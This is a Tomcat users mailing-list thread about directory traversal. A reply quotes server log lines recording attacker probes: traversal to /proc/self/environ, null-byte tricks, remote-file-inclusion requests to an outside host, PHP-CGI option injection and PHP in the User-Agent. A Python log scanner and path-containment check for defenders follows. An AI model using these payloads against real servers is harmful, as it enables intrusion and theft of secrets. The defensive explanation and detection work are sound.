Athanasios Kostopoulos wrote:
On 22/11/12 10:52, Aditi Sinha wrote:
Hi Andre,
Agree with your points.
Just wanted to know more about "Directory Traversal Attack".
Can it lead to access to directories outside the Tomcat/webapps folder as well,
or can it only access the applications within the Tomcat/webapps
folder?
Thanks & Regards,
Aditi
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
Hi everyone,
OWASP maintains some nice resources about path traversal attacks. A nice
starting point is the following:
https://www.owasp.org/index.php/Path_Traversal
And for anyone who might think that this is not a genuine concern, here are a few recent
samples from a logfile of one of our servers (among many, many similar ones):
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?mod=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /index.php?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /index.php?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET /main.php?x=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
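The log excerpt above shows three probe families on one host within two seconds: `../` traversal to `/proc/self/environ` with a trailing `%00`, remote-file-inclusion style values (`page=http://...`), and PHP-CGI `-d` option injection, all carrying PHP in the User-Agent. As an added example (not code from this thread, from Tomcat, or from OWASP), the Python script below does two things a defender wants here: it scans access-log lines for those indicators, and it answers Aditi's question by showing lexically that a traversal string resolves outside the webapps root unless the serving code normalises and contains the path. Three log entries are copied from the post; the fourth, benign line (client 192.0.2.10, a documentation address) is constructed so the scanner has something it must not flag. The `/opt/tomcat/webapps` base directory is an assumed path.

```python
import posixpath
import re
from urllib.parse import unquote

# Three entries copied verbatim from the log excerpt in the post, plus one
# constructed benign request (192.0.2.10 is a documentation address).
SAMPLE_LOG = r"""
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET /?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
192.0.2.10 - - [17/Nov/2012:16:01:02 +0100] "GET /docs/index.html HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
"""

# Apache/Tomcat "combined" access-log format. The User-Agent group is greedy
# because the UA field in the samples contains escaped double quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

SENSITIVE_FILES = ('/proc/self/environ', '/etc/passwd', '/etc/shadow')
PHP_CGI_RE = re.compile(r'(?:^|[+\s])-d[A-Za-z_]+=')   # "-dsafe_mode=Off" style
REMOTE_RE = re.compile(r'=(?:https?|ftp)://', re.IGNORECASE)  # param value is a URL


def fully_decode(s, max_rounds=3):
    """Percent-decode until stable, so double-encoded payloads are seen too."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target, user_agent=''):
    """Return the list of indicator names found in one request line."""
    findings = []
    decoded = fully_decode(target)
    _, _, query = decoded.partition('?')
    if '../' in decoded or '..\\' in decoded:
        findings.append('path_traversal')
    if '\x00' in decoded:                       # %00 truncation attempt
        findings.append('null_byte')
    if REMOTE_RE.search(decoded):
        findings.append('remote_include')
    if PHP_CGI_RE.search(query):
        findings.append('php_cgi_argument_injection')
    if any(name in decoded for name in SENSITIVE_FILES):
        findings.append('sensitive_file')
    if '<?php' in user_agent.lower():           # code staged via /proc/self/environ
        findings.append('php_in_user_agent')
    return findings


def scan_log(text):
    """Parse combined-format lines and return one alert dict per flagged request."""
    alerts = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                            # unparseable line: skip, do not crash
        findings = classify_request(m['target'], m['ua'])
        if findings:
            alerts.append({'ip': m['ip'], 'status': int(m['status']),
                           'target': m['target'], 'indicators': findings})
    return alerts


def is_within_base(base, user_path):
    """Lexical containment check: does base/user_path stay under base after
    '..' segments are collapsed? A serving layer that skips this step will
    happily hand out files outside the webapps tree. Real code should also
    canonicalise symlinks (os.path.realpath) before comparing."""
    if '\x00' in user_path:                     # NUL can truncate paths in native code
        return False
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip('/')))
    return candidate == base or candidate.startswith(base + '/')


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert['ip'], alert['status'], alert['indicators'], alert['target'])
    for probe in ('ROOT/index.html', '../../../../../../../../proc/self/environ'):
        print(probe, '->', 'inside' if is_within_base('/opt/tomcat/webapps', probe) else 'OUTSIDE')
```

Run against the excerpt, the three attacker lines are flagged and the benign one is not; the containment check shows that the eight `../` segments collapse to `/proc/self/environ`, well outside `/opt/tomcat/webapps`, which is exactly why the answer to "can it reach outside webapps?" depends on whether the code that opens the file normalises and checks the path, not on where the webapp lives. Note the 200 responses on `/` in the excerpt only mean the default page was served; the probes are generic PHP-CGI and LFI scans, not evidence that Tomcat itself honoured them.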